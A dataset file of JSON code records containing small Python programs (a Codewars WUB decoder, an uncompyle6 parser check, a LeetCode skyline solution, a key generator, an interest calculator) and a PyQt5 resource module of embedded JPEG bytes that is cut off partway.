+{"seq_id":"14737617809","text":"\"\"\"\r\ncodewars.com/kata/551dc350bf4e526099000ae5\r\n\r\nA DJ remixes songs by adding WUB in between each word.\r\nHelp Jonny restore songs that have been WUBed\r\n\"\"\"\r\n\r\ndef song_decoder(song):\r\n    edited_song = song\r\n    x = 0\r\n    for char in edited_song:\r\n        if edited_song[x : x + 3] == \"WUB\": #Conditional replaces any segments of WUBs with a space\r\n            edited_song = \" \".join([edited_song[:x], edited_song[x + 3:]])\r\n        x += 1\r\n    split_song = edited_song.split() #Allows words to be separated by only 1 space, no matter the WUBs\r\n    non_spaced_words = [word for word in split_song if word != \"\"]\r\n    result = \" \".join(non_spaced_words)\r\n    return(result)\r\n\r\ntest_song = \"WUBABCWUBWUBBWUBCWUB\"\r\nprint(song_decoder(test_song))\r\n","repo_name":"ryoiwata/galvanize_python_self_assessment","sub_path":"ryo_iwata_python_self_assessment/python_code_wars/dubstep.py","file_name":"dubstep.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"11114236156","text":"def and_not_check(\n    self, lhs, n, rule, ast, tokens, first, last\n) -> bool:\n    jmp = ast[1]\n    if jmp.kind.startswith(\"jmp_\"):\n        if last == n:\n            return True\n        jmp_target = jmp[0].attr\n\n        if tokens[first].off2int() <= jmp_target < tokens[last].off2int():\n            return True\n        if rule == (\"and_not\", (\"expr\", \"jmp_false\", \"expr\", \"POP_JUMP_IF_TRUE\")):\n            jmp2_target = ast[3].attr\n            return jmp_target != jmp2_target\n        return jmp_target != tokens[last].off2int()\n    return False\n","repo_name":"rocky/python-uncompyle6","sub_path":"uncompyle6/parsers/reducecheck/and_not_check.py","file_name":"and_not_check.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":3383,"dataset":"github-code","pt":"37"}
+{"seq_id":"10741216549","text":"\"\"\"\n218. The Skyline Problem\nA city's skyline is the outer contour of the silhouette formed by all the buildings in the city when viewed from a distance. Given the locations and heights of all the buildings, return the skyline formed by these buildings.\n\nThe geometric information of each building is given by the array buildings, where the triplet buildings[i] = [lefti, righti, heighti] means:\n\nlefti is the x coordinate of the left edge of the ith building.\nrighti is the x coordinate of the right edge of the ith building.\nheighti is the height of the ith building.\nThe skyline should be represented as a list of \"key points\" in the format [[x1,y1],[x2,y2],...], sorted by x coordinate.\nA key point is the left endpoint of a horizontal segment. The last point in the list is the endpoint of the rightmost building; its y coordinate is always 0 and only marks the end of the skyline.\nIn addition, the ground between any two adjacent buildings should be considered part of the skyline contour.\n\nNote: there must be no consecutive horizontal lines of equal height in the output skyline. For example, [...[2 3], [4 5], [7 5], [11 5], [12 7]...] is not acceptable;\nthe three lines of height 5 should be merged into one in the final output: [...[2 3], [4 5], [12 7], ...]\n\nExample 1:\nInput: buildings = [[2,9,10],[3,7,15],[5,12,12],[15,20,10],[19,24,8]]\nOutput: [[2,10],[3,15],[7,12],[12,0],[15,10],[20,8],[24,0]]\nExplanation:\nFigure A shows the locations and heights of all the input buildings;\nFigure B shows the skyline formed by them. The red dots in Figure B mark the key points in the output list.\n\nExample 2:\nInput: buildings = [[0,2,3],[2,5,3]]\nOutput: [[0,3],[5,0]]\n\nConstraints:\n1 <= buildings.length <= 10^4\n0 <= lefti < righti <= 2^31 - 1\n1 <= heighti <= 2^31 - 1\nbuildings is sorted by lefti in non-decreasing order\n\nSource: LeetCode (力扣)\nLink: https://leetcode-cn.com/problems/the-skyline-problem\nThe copyright belongs to LeetCode China. For commercial reprints contact the official authorization; for non-commercial reprints credit the source.\n\"\"\"\nfrom typing import List\nfrom sortedcontainers import SortedList\n\n\nclass Solution:\n    # sweep over the change points in order\n    def getSkyline(self, buildings: List[List[int]]) -> List[List[int]]:\n        ans = []\n        changes = []\n        for left, right, height in buildings:\n            changes.append((left, -height))\n            changes.append((right, height))\n        # sort by the order in which changes occur\n        changes.sort()\n        # a default height of 0 is always present\n        lives = SortedList([0])\n        # maximum height at the previous step\n        prev = 0\n        for x, h in changes:\n            # add or remove the building depending on the sign of h\n            if h < 0:\n                lives.add(h)\n            else:\n                lives.remove(-h)\n            # current maximum height after the add/remove\n            curr = -lives[0]\n            # the maximum height changed\n            if curr != prev:\n                ans.append([x, curr])\n                prev = curr\n        return ans\n","repo_name":"GeorgeDaiz/my_python","sub_path":"Leetcode/Array-Str/218.天际线问题.py","file_name":"218.天际线问题.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"40952692787","text":"import string\nimport secrets\n\n\ndef gen_key(parts=4, chars_per_part=8):\n    items = string.ascii_uppercase + string.digits\n    key = []\n    for _ in range(parts):\n        key.append(''.join(secrets.choice(items) for i in range(chars_per_part)))\n    return '-'.join(key)\n\nprint(gen_key())\n","repo_name":"natenka/100-days-of-Python","sub_path":"talkpython-100-days/day009/beginner/bite_044.py","file_name":"bite_044.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"37"}
+{"seq_id":"22534717300","text":"def main():\n    print(\"This program calculates the total future value\")\n    print(\"of a multi-year investment by describing\")\n    print(\"the interest accrued in terms of a nominal rate\")\n    print(\"and the number of compounding periods.\")\n\n    principal = eval(input(\"Enter the initial principal: \"))\n    interestrate = eval(input(\"Enter the interest rate: \"))\n    periods = eval(input(\"Enter the number of compounding periods per year: \"))\n    years = eval(input(\"Enter the number of years for the investment: \"))\n\n    nominalrate = interestrate / periods\n\n    for i in range(periods * years):\n        principal = principal * (1 + nominalrate)\n\n    print(\"The value in \", years ,\"years is:\", principal, sep=\" \")\n\nmain()\n","repo_name":"levietduc0712/Plot_Python","sub_path":"Chap2/Chap2_7.py","file_name":"Chap2_7.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"31087599140","text":"# -*- coding: utf-8 -*-\n\n# Resource object code\n#\n# Created by: The Resource Compiler for PyQt5 (Qt v5.9.6)\n#\n# WARNING! 
","repo_name":"GeorgeDaiz/my_python","sub_path":"Leetcode/Array-Str/218.天际线问题.py","file_name":"218.天际线问题.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"40952692787","text":"import string\nimport secrets\n\n\ndef gen_key(parts=4, chars_per_part=8):\n    items = string.ascii_uppercase + string.digits\n    key = []\n    for _ in range(parts):\n        key.append(''.join(secrets.choice(items) for _ in range(chars_per_part)))\n    return '-'.join(key)\n\nprint(gen_key())\n","repo_name":"natenka/100-days-of-Python","sub_path":"talkpython-100-days/day009/beginner/bite_044.py","file_name":"bite_044.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"37"}
{"seq_id":"22534717300","text":"def main():\n    print(\"This program calculates the total future value\")\n    print(\"of a multi-year investment by describing\")\n    print(\"the interest accrued in terms of a nominal rate\")\n    print(\"and the number of compounding periods.\")\n\n    principal = float(input(\"Enter the initial principal: \"))\n    interestrate = float(input(\"Enter the interest rate: \"))\n    periods = int(input(\"Enter the number of compounding periods per year: \"))\n    years = int(input(\"Enter the number of years for the investment: \"))\n\n    # The rate applied each period is the nominal annual rate split across the periods\n    periodicrate = interestrate / periods\n\n    for _ in range(periods * years):\n        principal = principal * (1 + periodicrate)\n
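\n    # Editor's note: the loop above evaluates the closed-form future value\n    # FV = P * (1 + r/m) ** (m * t)\n    # (principal P, nominal rate r, m periods per year, t years) one period at a time.\n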
\n    print(\"The value in\", years, \"years is:\", principal)\n\nmain()\n","repo_name":"levietduc0712/Plot_Python","sub_path":"Chap2/Chap2_7.py","file_name":"Chap2_7.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"31087599140","text":"# -*- coding: utf-8 -*-\n\n# Resource object code\n#\n# Created by: The Resource Compiler for PyQt5 (Qt v5.9.6)\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore\n\nqt_resource_data = b\"\\
[... several thousand escaped bytes elided: qt_resource_data embeds a compiled JPEG image (JFIF/Exif signature at the start of the blob); the record is truncated partway through the payload ...]
4f\\x4b\\\n\\x9f\\x0a\\x71\\x35\\x96\\x8f\\x3e\\x25\\x23\\x25\\xee\\xd6\\x4f\\x2a\\x45\\xff\\\n\\x00\\x8b\\x8a\\xfe\\x90\\x4b\\x47\\x9f\\x12\\xf0\\x1c\\xf4\\xb9\\xf0\\xa1\\x37\\\n\\xe4\\xbc\\xfc\\xf4\\x4a\\xed\\xa9\\xf0\\xda\\x7f\\xac\\x29\\xe9\\x73\\xe1\\x4e\\\n\\x22\\xc7\\x83\\xcf\\x89\\x48\\xcb\\xcd\\xac\\xa3\\x4d\\x4b\\x77\\xd0\\x79\\x71\\\n\\x5d\\x7e\\x50\\xe5\\xa3\\xcf\\x89\\x78\\x0e\\x7a\\x5c\\xf7\\x20\\x5c\\xe8\\xbb\\\n\\xaa\\xe7\\x44\\xae\\xdc\\x47\\xc3\\x69\\xe8\\x3c\\xc1\\xda\\xe7\\xc2\\x81\\xd9\\\n\\xe7\\xbd\\x4c\\x9a\\x7d\\x3a\\x76\\xab\\x52\\x97\\xa4\\xd3\\xa5\\x15\\x35\\x37\\\n\\x30\\xe2\\x5a\\x6a\\x59\\xbd\\x42\\x9c\\x51\\xb0\\x0a\\x3e\\xa5\\x12\\x79\\x42\\\n\\xe7\\xab\\xbd\\x73\\x8e\\x79\\xf9\\xee\\x43\\xd2\\x2a\\x9b\\x1d\\x7e\\x90\\xdc\\\n\\xfc\\xbc\\xf6\\x3a\\xc3\\xdf\\xda\\x19\\x19\\x47\\x66\\x9e\\xa4\\xb5\\x30\\xb5\\\n\\xcc\\xe5\\x6d\\x05\\x6b\\x6d\\x04\\x27\\x26\\x70\\x90\\x78\\x41\\x31\\x8d\\xd7\\\n\\x09\\xb8\\x2b\\x7f\\x3f\\xa2\\x66\\x42\\x91\\xb3\\x45\\xc5\\x7b\\x37\\xaa\\xe7\\\n\\x53\\x91\\x9a\\xc1\\x75\\x99\\x1c\\x09\\x4f\\xc6\\x2f\\xa2\\x51\\x14\\x69\\xf9\\\n\\x85\\x4b\\xb1\\xef\\xc1\\xb3\\x89\\x2a\\x0a\\xce\\x91\\xa9\\x23\\x2c\\x5b\\x55\\\n\\xb5\\x53\\xab\\x77\\x7e\\xb2\\x30\\xa5\\x55\\xfe\\x3d\\xda\\x89\\xc5\\x58\\x42\\\n\\xb5\\x82\\x2b\\x8d\\x52\\x6b\\x61\\xb4\\x4e\\xbd\\x2e\\x87\\xd3\\xec\\xee\\xa5\\\n\\xc5\\xa9\\x0a\\xbe\\x50\\x9b\\x68\\x80\\x40\\xff\\x00\\xcf\\x28\\xa8\\x71\\x1b\\\n\\x13\\x09\\xbf\\xdf\\x76\\xa4\\x13\\xdb\\x4e\\x0b\\xbf\\xae\\xfd\\x65\\xf8\\x93\\\n\\x01\\xe2\\x2c\\x25\\x43\\xa2\\x55\\x6b\\x72\\x2d\\x31\\x21\\x59\\x63\\xda\\x64\\\n\\x94\\x1d\\x0a\\x6b\\x26\\x54\\x9b\\xae\\xda\\x95\\x59\\x69\\xd0\\xc4\\xb1\\xed\\\n\\x75\\x4d\\xd5\\xb9\\x36\\xeb\\x52\\x6f\\xe0\\xbb\\x5e\\xf5\\xd9\\xa9\\x0d\\xdd\\\n\\x22\\x87\\x8d\\x30\\xf6\\xcf\\x5e\\xda\\x1d\\x32\\x4d\\x06\\x9f\\x34\\xb1\\x28\\\n\\x8a\\xa2\\x4e\\x69\\xb9\\x65\\x15\\x14\\x9d\\xda\\x6f\\x66\\x6f\\x6c\\xb9\\xed\\\n\\x70\\x15\\xc2\\x45\\xe2\\x15\\xcd\\x89\\x12\\x87\\x4e\\x7e\\x6b\\xe8\\x85\\xa2\\\n\\x2b\\x5b\\x55\\xe9\\x79\\x27\\xaa\\x9a\\x9a\\xc6\\x04\\xc4\\xb4\\xac\\x0f\\x4c\\\n\\xc6\\xf5\\x66\\x25\\xdb\\xa5\\x55\\x5c\\x3e\\xcc\\xa7\\x1e\\x0a\\xba\\x8e\\x62\\\n\\x54\\x53\\x7c\\xca\\x51\\xca\\x4d\\xcf\\x3f\\x31\\x69\\x11\\xb5\\x53\\x7a\\xf6\\\n\\xe4\\xf5\\x52\\x64\\xec\\xab\\xf7\\xf7\\xaf\\xa2\\x1d\\x35\\x3b\\x64\\x1b\\x45\\\n\\x61\\xda\\x65\\x52\\x8a\\xfc\\x90\\xa8\\xce\\xca\\xa6\\xa1\\x20\\x99\\x7a\\xb3\\\n\\x2d\\xcf\\x4c\\xb4\\x53\\x98\\x29\\xa4\\x15\\x02\\x94\\xdb\\xf0\\xfc\\xa3\\x25\\\n\\xb4\\xc3\\x9b\\x91\\xd3\\xeb\\xd6\\xbe\\x88\\x5a\\x42\\x7e\\x0f\\x28\\x9c\\x55\\\n\\x4d\\x55\\x4e\\x9d\\x89\\x31\\x66\\x19\\xaa\\xe2\\xc7\\x25\\x64\\x65\\x24\\x68\\\n\\x2e\\xa5\\x15\\x26\\x9b\\x59\\x69\\xa6\\xe6\\x5c\\x50\\x41\\x77\\x71\\xc8\\xba\\\n\\xbb\\x20\\x2b\\x28\\x02\\xe9\\xe5\\x14\\x8b\\x0e\\x1b\\x9a\\xdf\\x84\\xf5\\x21\\\n\\x51\\xcb\\x85\\xf2\\xb3\\xfe\\x10\\xa7\\x0f\\x6c\\xc3\\x14\\xe2\\x3a\\x4b\\x55\\\n\\x86\\xfd\\x8e\\x9b\\x27\\x38\\xb5\\x33\\x2a\\xf5\\x52\\x75\\xb9\\x47\\x27\\xd6\\\n\\x39\\xa1\\xac\\xe6\\xf6\\xe9\\xc2\\x3c\\x45\\xbe\\x23\\x5a\\xec\\xfc\\x7f\\xa4\\\n\\x1a\\x36\\x7a\\xa5\\xe5\\xfd\\xa9\\x8d\\x29\\xb3\\xbc\\x57\\x35\\x8f\\xd1\\x80\\\n\\x8d\\x31\\x12\\x95\\xf0\\xb5\\x21\\x32\\xd3\\x2a\\x0d\\xb4\\xda\\x82\\x0a\\xec\\\n\\x92\\x74\\x5a\\x8a\\x46\\x60\\xab\\xd8\\xc1\\x74\\x6d\\xce\\xac\\xde\\x49\\xea\\\n\\xa1\\x4a\\xd5\\x4e\\x7f\\x35\\xf4\\x42\\xb9\\x8c\\x07\\x88\\xa4\\xea\\x98\\x96\\\n\\x9b\\x3a\\xc3\\x72\\xb3\\x94\\x06\\xcb\\xf3\\xec\\xba\\xfa\\x43\\xab\\x40\\x52\\\n\\x52\\x14\\x0e\
\xa3\\x21\\x2a\\x6e\\xd9\\x79\\x85\\x0e\\x9a\\xc0\\x91\\x1a\\xec\\\n\\x9d\\x2d\\xeb\\xb7\\x52\\x12\\xa9\\x4e\\x56\\x6d\\xc9\\xb3\\x5a\\x99\\xb4\\xbd\\\n\\x99\\xd6\\xaa\\x38\\x7e\\x9f\\x5e\\x9c\\xa9\\xd0\\xe8\\x92\\x33\\xeb\\x52\\x64\\\n\\x1d\\xab\\x4f\\x22\\x59\\x0f\\x65\\x36\\x51\\x69\\x07\\x55\\xd8\\xfa\\xd5\\x61\\\n\\xfc\\xe2\\x1f\\x15\\xad\\x75\\x38\\xe5\\xb9\\x3d\\x54\\xd5\\x21\\xae\\xcf\\xe5\\\n\\x7d\\x10\\xe5\\xeb\\x14\\x89\\xba\\x25\\x76\\x7e\\x8b\\x3e\\x81\\xed\\x92\\xae\\\n\\xad\\x87\\xd0\\xdb\\x81\\x6a\\x71\\x49\\x36\\x25\\x4b\\x1a\\x04\\x69\\xd3\\xfc\\\n\\xe3\\x64\\xc2\\xef\\xde\\xbb\\x57\\x32\\x18\\xcf\\x3e\\xad\\xc9\\xb3\\x5a\\x98\\\n\\x37\\x19\\x43\\x99\\x91\\x64\\xe8\\x95\\xdb\\xdd\\xa4\\xf6\\x42\\x7d\\x47\\xcc\\\n\\x1d\\xaf\\x8e\\xe4\\xce\\x3b\\xf9\\x3f\\x3d\\xeb\\x98\\x32\\x1b\\x96\\xb2\\x2a\\\n\\xea\\xd5\\x48\\xcd\\xc6\\xa1\\xdd\\xc5\\x7a\\x47\\x88\\xa9\\x68\\xfc\\xf8\\x97\\\n\\x30\\x4f\\x4b\\xe3\\xc2\\x99\\xc8\\xb8\\xd1\\xdc\\xe9\\xb0\\xd0\\x2e\\xdc\\x20\\\n\\xf6\\x6d\\x1d\\x4f\\x98\\x99\\xe9\\x73\\xe1\\x4e\\x23\\x96\\x8f\\x3e\\x25\\x27\\\n\\x27\\x11\\x6f\\x22\\xae\\x75\\x52\\x33\\x71\\x1f\\x2e\\xaf\\xa0\\xf1\\x15\\x2d\\\n\\x1e\\x7c\\x4b\\xc0\\x53\\xd2\\xe7\\xc2\\x81\\x7e\\x4e\\xe7\\xe5\\xa2\\x57\\x6d\\\n\\x07\\x86\\x91\\xfd\\x61\\x4f\\x4b\\x9f\\x0a\\x71\\x09\\x68\\xf3\\xe2\\x51\\x72\\\n\\xf3\\x6b\\x27\\x95\\x23\\x3f\\xf1\\x75\\x7f\\xd2\\x1c\\xb4\\x79\\xf1\\x2f\\x00\\\n\\x9e\\x97\\x3e\\x14\\xe2\\x35\\xfe\\x17\\x73\\xf8\\x4a\\xed\\xaf\\xc9\\xa4\\x7f\\\n\\x58\\x27\\xa5\\xe7\\xed\\x4e\\x21\\x2d\\x1e\\x7c\\x4b\\xc0\\x32\\x7c\\x6d\\x64\\\n\\x4e\\x9a\\xa9\\x19\\xf4\\x1e\\x5d\\x5f\\x5f\\x90\\x85\\x2d\\x1e\\x7c\\x4b\\xc0\\\n\\x27\\xa5\\xcf\\x85\\x02\\xff\\x00\\x0b\\x99\\xcd\\xce\\x89\\x5e\\x5e\\x23\\xe1\\\n\\xa4\\x74\\x1e\\x61\\xf6\\xb9\\xf0\\xa7\\x10\\xec\\xf3\\xe2\\x50\\x4b\\x64\\xe6\\\n\\x68\\x21\\x36\\x4f\\x12\\x91\\x9f\\x81\\x3e\\x5d\\x5f\\x53\\xe2\\x09\\x68\\xfc\\\n\\x78\\x94\\x15\\x74\\xbe\\x7c\\x28\\x65\\xa0\\x89\\x64\\xa5\\xe0\\xb3\\x99\\x62\\\n\\xc9\\x7b\\x27\\xbd\\x58\\xec\\xca\\x3d\\x09\\xfc\\xe4\\x5f\\xb7\\x51\\x07\\x6b\\\n\\xe7\\xc2\\x99\\x93\\xac\\xc6\\x57\\x49\\xb7\\xcb\\x37\\x89\\x73\\xaf\\x51\\x82\\\n\\xb5\\x67\\x1b\\xac\\xa8\\x09\\x46\\xa5\\x00\\xfb\\xb4\\x9e\\xeb\\x57\\xad\\x50\\\n\\xb9\\xea\\xef\\x5c\\xe7\\x42\\x25\\x38\\x5f\\x3d\\xda\\x90\\x8e\\x2b\\x85\\x5d\\\n\\x79\\x97\\xa0\\x55\\xbd\\xe2\\x87\\x64\\x0f\\x48\\xf3\\x0b\\x9e\\xb5\\xd9\\xa9\\\n\\x03\\x9e\\xae\\xfd\\x62\\xd8\\x5a\\xd6\\x46\\x54\\xea\\x53\\x7f\\x76\\x83\\xf9\\\n\\x8f\\xad\\x50\\xe5\\xce\\x64\\xdb\\xad\\x47\\x3e\\x73\\xf7\\x6a\\x42\\x75\\xb8\\\n\\x37\\x5e\\x65\\xe8\\x0f\\xde\\x38\\x3f\\x28\\xf4\\x26\\x0e\\x3b\\xd7\\x66\\xa4\\\n\\x17\\x3d\\x49\\xea\\xa1\\x61\\x92\\xdc\\x19\\x51\\xcc\\x7d\\xd3\\x67\\xc9\\xf5\\\n\\xaa\\x0a\\x7c\\xb7\\x27\\xaa\\x87\\x3d\\x6b\\xe8\\x84\\xeb\\x7f\\x5e\\x65\\xf5\\\n\\xfb\\xd7\\x07\\x8f\\xc2\\x98\\x38\\xef\\x5f\\x44\\x17\\x3d\\x49\\xea\\xa4\\x69\\\n\\x97\\xd1\\x91\\xbf\\xfa\\x4d\\x9f\\xef\\x2a\\x0e\\x1b\\x93\\xd5\\x43\\x8e\\xf5\\\n\\xf4\\x42\\x6c\\x73\\x5b\\x8f\\x33\\x9d\\x3e\\xf5\\xc1\\xe7\\xf0\\x26\\x09\\x79\\\n\\xef\\x5f\\x44\\x0e\\x1b\\x93\\xd5\\x49\\xd3\\x25\\xf3\\x23\\x2a\\x39\\x1f\\xba\\\n\\x6c\\xf8\\x1e\\xb5\\x41\\xc3\\x72\\x7a\\xa8\\x73\\xd6\\xbe\\x88\\x4d\\x8e\\x62\\\n\\x2c\\xbc\\xcb\\xd4\\xa6\\xfe\\xf5\\xc1\\xf9\\x8f\\xa1\\x30\\x4b\\xcf\\x7a\\xed\\\n\\xd4\\x82\\x9f\\x39\\x93\\x66\\xb5\\x23\\x4b\\x5e\\xe8\\xca\\x8d\\x02\\xed\\xee\\\n\\xdb\\x3d\\x92\\x3d\\x6a\\xf3\\x07\\x3d\\x49\\xb3\\x5a\\x8f\\x9e\\xb5\\xdb\\xa9\\\n\\x09\\xca\\x73\\x14\\x59\\x79\\x97\\xaa\\x
91\\x7f\\x78\\xb1\\xdd\\x67\\xd2\\x9f\\\n\\x10\\xe5\\xce\\x75\\xdb\\xa9\\x02\\xac\\xff\\x00\\x1d\\xda\\xd4\\x9d\\x2c\\x1c\\\n\\xcc\\x8c\\xa9\\xd0\\x2e\\xde\\xed\\x27\\xb2\\x13\\xeb\\x3e\\x62\\x7b\\x5f\\x1d\\\n\\xc9\\x9d\\x45\\xd9\\xf9\\xef\\x5c\\xc4\\xe5\\x37\\x2d\\x65\\x5d\\xd5\\xa9\\x45\\\n\\xf8\\xd4\\x3b\\xb8\\xaf\\x48\\xf1\\x15\\x2d\\x1f\\x9f\\x12\\xe6\\x14\\xf4\\xbe\\\n\\x3c\\x29\\x9c\\x34\\xca\\x1d\\xce\\x9b\\x27\\x40\\xbc\\x9c\\x09\\x3d\\x9a\\x47\\\n\\xa8\\xf9\\x30\\x76\\xbe\\x3c\\x29\\x9f\\x68\\x76\\x7e\\x7c\\x4b\\x98\\x7d\\xde\\\n\\xaa\\x6f\\x22\\xae\\x75\\x53\\x79\\xb8\\x88\\xee\\xea\\xfa\\x0f\\x11\\x52\\xd1\\\n\\xf2\\xf7\\x2f\\x00\\x9e\\x97\\x3e\\x14\\xe2\\x45\\xc1\\x08\\x7b\\x3a\\x6c\\x38\\\n\\x52\\xee\\x4d\\x07\\x86\\x91\\xd7\\xfe\\x23\\x07\\x6b\\xcf\\xda\\x9c\\x45\\xd9\\\n\\xf2\\xf7\\x2f\\x00\\xc9\\x7c\\xcc\\xe4\\xfc\\xca\\x6b\\x36\\xbf\\x37\\x97\\xfd\\\n\\xd8\\x25\\xa3\\xe5\\xee\\x5e\\x04\\xd5\\x3c\\x2f\\x3f\\x6a\\x71\\x27\\x37\\xc2\\\n\\xf6\\x7f\\xca\\x97\\x72\\x7f\\x06\\x51\\xfd\\xe3\\x04\\xf4\\xbc\\xfd\\xa9\\xc4\\\n\\x72\\xd1\\xf2\\xf7\\x2f\\x02\\x37\\x7f\\x13\\x59\\x39\\x71\\x29\\xac\\xfa\\x0f\\\n\\x2e\\xaf\\xfb\\xa2\\x09\\x68\\xf9\\x7b\\x97\\x80\\xe7\\x3c\\x2f\\x3f\\x6a\\x71\\\n\\x22\\xff\\x00\\x0b\\x99\\xd5\\xae\\x89\\x73\\x27\\x11\\xf0\\xd2\\x3a\\x0f\\xcd\\\n\\x13\\xda\\xf3\\xf6\\xa7\\x11\\xf6\\x79\\xf1\\x2f\\x02\\x32\\x7c\\x6d\\x64\\x4d\\\n\\x93\\xaa\\x9b\\xcf\\xc0\\x9f\\x2e\\xaf\\xd4\\x7c\\x08\\x25\\xa3\\xe5\\xee\\x5e\\\n\\x05\\x4f\\x4b\\x9f\\x0a\\x71\\x23\\x5c\\xc9\\x77\\x3a\\xae\\xad\\x12\\xbc\\x9c\\\n\\x6a\\xf0\\xd2\\x3d\\x23\\xcc\\x1d\\xaf\\x9f\\x0a\\x66\\x0e\\xcf\\xc7\\x89\\x73\\\n\\x8b\\x90\\xe5\\x2d\\xe4\\x45\\x93\\xa9\\x4d\\xfd\\xda\\x4f\\x75\\xab\\xd4\\x7c\\\n\\x08\\x99\\x68\\xfc\\x77\\xae\\x71\\xcf\\x4b\\xe7\\xb9\\x33\\x05\\xcd\\xc2\\xae\\\n\\xbc\\xcb\\xd1\\x2b\\xb7\\xbc\\x58\\xec\\x84\\xfa\\x13\\xe6\\x0e\\xd7\\xca\\xec\\\n\\x4c\\xc8\\x1c\\xf5\\x77\\xeb\\x51\\x32\\x8c\\xa5\\x19\\x51\\x95\\x1a\\x94\\xdf\\\n\\xdd\\xa0\\xf7\\x59\\xf5\\xab\\xc4\\x39\\x73\\x99\\x36\\xeb\\x51\\xcf\\x9c\\xfd\\\n\\xda\\x90\\x35\\xb8\\x37\\x5e\\x65\\xe8\\x15\\xf7\\x8e\\x0f\\xca\\x3d\\x09\\x83\\\n\\x8e\\xf5\\xd9\\xa9\\x03\\x9e\\xa4\\xdb\\xad\\x44\\xb0\\xb5\\xb2\\xa3\\x2a\\x39\\\n\\x8f\\xbb\\x6c\\xf9\\x3e\\xb5\\x44\\xf0\\xdc\\x9e\\xaa\\x39\\xf3\\x9d\\x7d\\x10\\\n\\x5d\\x6f\\xeb\\xcc\\xbe\\x47\\xef\\x1c\\x1e\\x07\\xa5\\x30\\x71\\xde\\xbe\\x88\\\n\\x57\\x3d\\x49\\xea\\xa2\\xe9\\x97\\xd1\\x95\\x1f\\xf4\\xd0\\x7f\\xbe\\xa8\\x9e\\\n\\x1b\\x93\\xd5\\x4a\\xbf\\xce\\x3f\\xe9\\x00\\xde\\xfe\\xbc\\xcb\\xff\\x00\\xa8\\\n\\xb1\\xfd\\xc4\\xc3\\xe3\\xbd\\x7d\\x10\\x39\\xea\\xfe\\xd4\\x43\\xca\\xfc\\x19\\\n\\x53\\xd7\\xee\\xd2\\x7c\\x7e\\x33\\x13\\xa3\\xb3\\x72\\x7a\\xa9\\x69\\x3e\\x71\\\n\\xff\\x00\\x44\\x71\\x66\\xb5\\x97\\x99\\x5c\\xc7\\xde\\x28\\x79\\x3e\\x91\\x0f\\\n\\x8e\\xf5\\xf4\\x40\\xe7\\xab\\xfb\\x10\\x91\\x6b\\xe6\\x4e\\x54\\xf2\\x3e\\x84\\\n\\x9f\\x03\\xd4\\x62\\x39\\xea\\x4d\\x9a\\xd4\\xb4\\x9f\\x38\\xff\\x00\\xa2\\x2c\\\n\\x73\\x11\\x65\\x5d\\x5a\\x94\\xdf\\x8d\\x5f\\xf1\\x1f\\x48\\x8a\\xe7\\xad\\x76\\\n\\xea\\x40\\xe7\\xab\\xbb\\x58\\xb7\\x16\\x07\\x32\\x6c\\x9d\\x02\\xad\\xc0\\x93\\\n\\xd9\\x23\\xa9\\x89\\xe7\\xa9\\x36\\x26\\x75\\x2b\\x9e\\xbe\\xf2\\x6d\\xa9\\x46\\\n\\x55\\x5d\\x5a\\xa9\\x37\\xe3\\x57\\x95\\x9e\\x83\\xc4\\x4c\\xb4\\x7e\\x7b\\xd7\\\n\\x30\\x73\\xf0\\x2d\\xf4\\x4a\\xae\\x2c\\x34\\x0a\\xb7\\x08\\xf0\\x81\\xd4\\xf9\\\n\\x85\\x3d\\x2f\\x8f\\x0a\\x67\\x0e\\x7e\\x42\\xdc\\xd3\\x65\\x5c\\xea\\xa4\\xdf\\\n\\x88\\xf9\\x5a\\xba\\x0f\\x10\\x4b\\x47\\x9f\\x12\\x87\\x3f\\x04\\x5f
\\x92\\xf3\\\n\\x27\\x4d\\x02\\xed\\xa0\\xf0\\x84\\xf5\\xf9\\xc1\\x3d\\x2f\\x3f\\x6a\\x71\\x1f\\\n\\x67\\x9e\\xf5\\x22\\xdc\\xd1\\x97\\xca\\x93\\x7d\\x7e\\x6b\\x57\\xf4\\x85\\x2d\\\n\\x1f\\x2f\\x72\\xf0\\x09\\xe9\\x73\\xdc\\x84\\xdf\\x92\\xef\\xe1\\x2a\\xb7\\xf0\\\n\\x42\\x7f\\xac\\x13\\xd2\\xf3\\xf6\\xa7\\x10\\xec\\xf3\\xde\\xa2\\xdb\\x9a\\x2d\\\n\\xe4\\xa6\\xff\\x00\\xc5\\x6a\\xfe\\x90\\x4b\\x47\\xcb\\xdc\\xbc\\x02\\x7a\\x5c\\\n\\xf7\\x21\\x37\\xb8\\x0a\\x25\\x27\\x4b\\x05\\x2f\\x41\\x6e\\xc9\\x4f\\x6f\\x31\\\n\\x38\\xef\\xca\\x7d\\x6b\\xc1\\x35\\x75\\x8f\\x15\\xef\\xe3\\x8a\\x93\\x73\\x70\\\n\\xab\\xaa\\xea\\xd1\\x2a\\xb7\\x1a\\x87\\x64\\x0e\\x83\\xcc\\x54\\xf4\\xf5\\xef\\\n\\x5f\\xda\\x99\\x90\\x5c\\xf5\\x77\\x90\\x05\\x81\\x4e\\x54\\xd9\\x3a\\x94\\xdf\\\n\\x81\\x3e\\x54\\x7d\\x47\\xc4\\x25\\x6e\\x8f\\xc2\\x6d\\x5c\\xea\\x3e\\x7a\\xfb\\\n\\xb5\\x06\\x65\\x02\\x0d\\xd5\\x75\\x72\\x55\\xb8\\xd4\\x3b\\x24\\x7a\\x44\\x1b\\\n\\xef\\xef\\x5d\\x9a\\x90\\x5c\\xf5\\x77\\xeb\\x03\\x6b\\x58\\x04\\x65\\x4e\\xa4\\\n\\x7d\\xda\\x4f\\x9